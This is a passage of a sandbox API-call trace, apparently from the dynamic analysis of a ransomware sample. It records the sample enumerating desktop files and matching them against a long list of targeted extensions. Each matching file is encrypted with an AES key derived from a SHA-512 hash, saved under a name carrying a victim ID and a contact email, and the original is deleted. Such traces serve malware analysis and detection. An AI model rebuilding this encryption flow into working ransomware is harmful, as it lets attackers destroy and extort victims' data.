.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".png") returned=".png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0183.853] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.854] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.854] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\i j43i7a8s3av.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\i j43i7a8s3av.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0183.859] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x183bb, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x183bb, lpOverlapped=0x0) returned 1
	[0183.864] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.864] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb198) returned 1
	[0183.866] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.866] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0183.866] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.866] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0183.867] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.867] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb8f70) returned 1
	[0183.867] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.867] CryptEncrypt (in: hKey=0xfb8f70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x183bb, dwBufLen=0x183bb | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x183c0) returned 1
	[0183.869] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.869] RtlMoveMemory (in: Destination=0xff5548, Source=0xfdd180, Length=0x183bb | out: Destination=0xff5548) 
	[0183.870] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.870] CryptEncrypt (in: hKey=0xfb8f70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff5548*, pdwDataLen=0x18aefc*=0x183bb, dwBufLen=0x183c0 | out: pbData=0xff5548*, pdwDataLen=0x18aefc*=0x183c0) returned 1
	[0183.871] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.871] CryptDestroyKey (hKey=0xfb8f70) returned 1
	[0183.871] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.871] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0183.871] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.872] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0183.872] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.872] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.882] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.882] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0183.883] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\i j43i7a8s3av.png.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 102
	[0183.883] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\i j43i7a8s3av.png.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\i j43i7a8s3av.png.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0183.884] WriteFile (in: hFile=0x390, lpBuffer=0xff5548*, nNumberOfBytesToWrite=0x183c0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xff5548*, lpNumberOfBytesWritten=0x18b358*=0x183c0, lpOverlapped=0x0) returned 1
	[0183.892] CloseHandle (hObject=0x390) returned 1
	[0183.892] CloseHandle (hObject=0x388) returned 1
	[0183.892] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\i j43i7a8s3av.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\i j43i7a8s3av.png")) returned 1
	[0183.902] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\i j43i7a8s3av.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\i j43i7a8s3av.png")) returned 0
	[0183.902] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c2d1570, ftCreationTime.dwHighDateTime=0x1d966e6, ftLastAccessTime.dwLowDateTime=0xc284b840, ftLastAccessTime.dwHighDateTime=0x1d96b6f, ftLastWriteTime.dwLowDateTime=0xc284b840, ftLastWriteTime.dwHighDateTime=0x1d96b6f, nFileSizeHigh=0x0, nFileSizeLow=0x62d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="o54ifnl09Yoy8BDUWLy.jpg", cAlternateFileName="O54IFN~1.JPG")) returned 1
	[0183.902] lstrcmpW (lpString1="o54ifnl09Yoy8BDUWLy.jpg", lpString2="..") returned 1
	[0183.902] lstrcmpW (lpString1="o54ifnl09Yoy8BDUWLy.jpg", lpString2=".") returned 1
	[0183.902] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\"
	[0183.902] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\", lpString2="o54ifnl09Yoy8BDUWLy.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\o54ifnl09Yoy8BDUWLy.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\o54ifnl09Yoy8BDUWLy.jpg"
	[0183.903] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\o54ifnl09Yoy8BDUWLy.jpg") returned 66
	[0183.903] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.903] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\o54ifnl09Yoy8BDUWLy.jpg", cchLength=0x42 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\o54ifnl09yoy8bduwly.jpg") returned 0x42
	[0183.903] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.903] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\o54ifnl09yoy8bduwly.jpg", lpSrch="help_decrypt_your_files") returned 0x0
	[0183.903] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\o54ifnl09yoy8bduwly.jpg" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\o54ifnl09yoy8bduwly.jpg") returned="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\o54ifnl09yoy8bduwly.jpg"
	[0183.903] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\o54ifnl09yoy8bduwly.jpg") returned 66
	[0183.903] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.904] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.905] StrStrW (lpFirst=".jpg", lpSrch=".") returned=".jpg"
	[0183.905] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.905] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".jpg") returned=".jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0183.905] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.906] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.906] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\o54ifnl09yoy8bduwly.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\o54ifnl09yoy8bduwly.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0183.909] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x62d2, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x62d2, lpOverlapped=0x0) returned 1
	[0183.913] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.913] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcae68) returned 1
	[0183.915] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.915] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0183.915] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.916] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0183.916] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.916] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb95b0) returned 1
	[0183.916] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.916] CryptEncrypt (in: hKey=0xfb95b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x62d2, dwBufLen=0x62d2 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x62e0) returned 1
	[0183.917] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.917] RtlMoveMemory (in: Destination=0xfe3460, Source=0xfdd180, Length=0x62d2 | out: Destination=0xfe3460) 
	[0183.917] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.918] CryptEncrypt (in: hKey=0xfb95b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe3460*, pdwDataLen=0x18aefc*=0x62d2, dwBufLen=0x62e0 | out: pbData=0xfe3460*, pdwDataLen=0x18aefc*=0x62e0) returned 1
	[0183.918] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.919] CryptDestroyKey (hKey=0xfb95b0) returned 1
	[0183.919] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.919] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0183.919] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.919] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0183.919] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
